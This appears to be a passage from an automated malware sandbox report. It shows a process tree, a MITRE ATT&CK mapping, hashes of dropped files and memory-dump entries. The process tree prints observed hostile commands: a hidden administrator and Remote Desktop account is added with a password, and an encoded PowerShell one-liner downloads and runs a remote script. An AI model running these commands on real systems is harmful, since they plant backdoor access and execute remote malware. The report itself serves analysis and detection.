cmd /C net.exe LOCALGROUP "Remote Desktop Users" OAILVCNY$ /ADD
1⤵
PID:524
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" OAILVCNY$ /ADD
  2⤵
  PID:2300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" OAILVCNY$ /ADD
    3⤵
    PID:1032

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:816
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3896

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc kKyHePFO
1⤵
PID:4916
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc kKyHePFO
  2⤵
  PID:3004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc kKyHePFO
    3⤵
    PID:1548

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:3108
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4604

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3616
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3668

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4576
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
1⤵
PID:3616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESDD21.tmp

Filesize
1KB

MD5
7b8c0d31a044b87f5fa91e7502cec37a

SHA1
e586cf0552cd59bf58f7399cebbd8c0bf59e0368

SHA256
1544d81d36803deb641506b4b02b29b9ec36fd18b03a86bac3088451b5ac4f80

SHA512
cec6074bfec271792853846d1e0049654720d8682435fea30cf5f0d7db7577692e640f079d677f909fcc955944690765c91197b51f4b212287bae5bc5f1bb1b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3r2mwgnx.20z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hv4feeey\hv4feeey.dll

Filesize
3KB

MD5
959cb4bc8b22acec5534b5207adfdde5

SHA1
b7fc9bb4872dede976e44d982aa9176138ea2a61

SHA256
928cbe98b35a3b1a0e52e904649326fc779f8f15e41e6be887b5ed0e4f097990

SHA512
21e6c9c7b234f4954b05dc5c580a0d2e530f0a96aeaf4009774104655e9839b7734a3513ddedca0295c711ecc99d22a7470b2cb7e2600be38961d864ef9f11e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
6938a2a0fa3adc1ab9cc3bb479ff0e74

SHA1
37e2117cf83cdf1a631a394ce6f0c57f70ee3f47

SHA256
df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068

SHA512
5509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
70d1bf1c7a95f0613358ac07bc3864ad

SHA1
52783a6ace472471ad68b602c604e48340737596

SHA256
88e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3

SHA512
ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
58b4c6a70f55d70a401015da300261b2

SHA1
a13b8a1a577c3638c311f5e668b61cea8a532d35

SHA256
9eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0

SHA512
0ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI67FC.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hv4feeey\CSC7C50704A470434AAC6117201A24C01.TMP

Filesize
652B

MD5
9992020fa9d7c3ecfe15d67d8c1c79fe

SHA1
fe8f1ea5a9f6567399ef44b8c4a669e03dda6481

SHA256
2471ea388275c7ba2db1beab31fae884f9b443186816731c54923e782627f5a0

SHA512
461b0981bb873b1332a2bb9dd9a641ec374e63a467c38da440fce5f993bf1fd3c8facd8ce008e575d4d8d85ce5dc97458fce3605efdc2977c5f4d7a2ff6baaf9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hv4feeey\hv4feeey.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hv4feeey\hv4feeey.cmdline

Filesize
369B

MD5
16c05a26c17b1d9fe2a14ab41cb1f014

SHA1
3808a8a11a8b0ecb3653639aee465e6cfb97d2dc

SHA256
1b8d1bd265c8cfd507d18c1a34533c7385d73887ed65dd0f6e90aeefcccfc0c3

SHA512
2333d8ea5a54d499bf18f335cf2734ce8d45a6c55f3e20c1b8e0ffea2be56b3a9a836349a1de54a6e8bafa45bdade3c4474ca8c7df4ddaca703a7cc510754ff0

Download Submit
memory/1216-110-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/1216-111-0x000001C199540000-0x000001C199550000-memory.dmp

Filesize
64KB

Download
memory/1216-112-0x000001C199540000-0x000001C199550000-memory.dmp

Filesize
64KB

Download
memory/1216-154-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/1216-157-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/1696-70-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/1696-66-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/1696-69-0x000002A13D070000-0x000002A13D080000-memory.dmp

Filesize
64KB

Download
memory/1696-67-0x000002A13D070000-0x000002A13D080000-memory.dmp

Filesize
64KB

Download
memory/2172-86-0x00007FF985D10000-0x00007FF985D29000-memory.dmp

Filesize
100KB

Download
memory/2172-84-0x000001D978D20000-0x000001D978D30000-memory.dmp

Filesize
64KB

Download
memory/2172-161-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/2172-160-0x00007FF985D10000-0x00007FF985D29000-memory.dmp

Filesize
100KB

Download
memory/2172-152-0x000001D978D20000-0x000001D978D30000-memory.dmp

Filesize
64KB

Download
memory/2172-8-0x000001D97AFD0000-0x000001D97AFF2000-memory.dmp

Filesize
136KB

Download
memory/2172-9-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/2172-10-0x000001D978D20000-0x000001D978D30000-memory.dmp

Filesize
64KB

Download
memory/2172-40-0x000001D97B8E0000-0x000001D97BAEA000-memory.dmp

Filesize
2.0MB

Download
memory/2172-39-0x000001D97B550000-0x000001D97B6C6000-memory.dmp

Filesize
1.5MB

Download
memory/2172-68-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/2172-36-0x000001D97B140000-0x000001D97B148000-memory.dmp

Filesize
32KB

Download
memory/2172-22-0x000001D978D20000-0x000001D978D30000-memory.dmp

Filesize
64KB

Download
memory/2172-71-0x000001D978D20000-0x000001D978D30000-memory.dmp

Filesize
64KB

Download
memory/2172-11-0x000001D978D20000-0x000001D978D30000-memory.dmp

Filesize
64KB

Download
memory/2172-88-0x000001D978D20000-0x000001D978D30000-memory.dmp

Filesize
64KB

Download
memory/3296-74-0x0000025DA0780000-0x0000025DA0790000-memory.dmp

Filesize
64KB

Download
memory/3296-72-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/3296-85-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/3296-73-0x0000025DA0780000-0x0000025DA0790000-memory.dmp

Filesize
64KB

Download
memory/4492-55-0x000002A8277A0000-0x000002A8277B0000-memory.dmp

Filesize
64KB

Download
memory/4492-56-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/4492-54-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/4940-5-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-41-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-0-0x000001F838DC0000-0x000001F8391E6000-memory.dmp

Filesize
4.1MB

Download
memory/4940-4-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-21-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/4940-3-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-44-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-2-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-1-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download
memory/4940-43-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-42-0x000001F838980000-0x000001F838990000-memory.dmp

Filesize
64KB

Download
memory/4940-163-0x00007FF97AA50000-0x00007FF97B511000-memory.dmp

Filesize
10.8MB

Download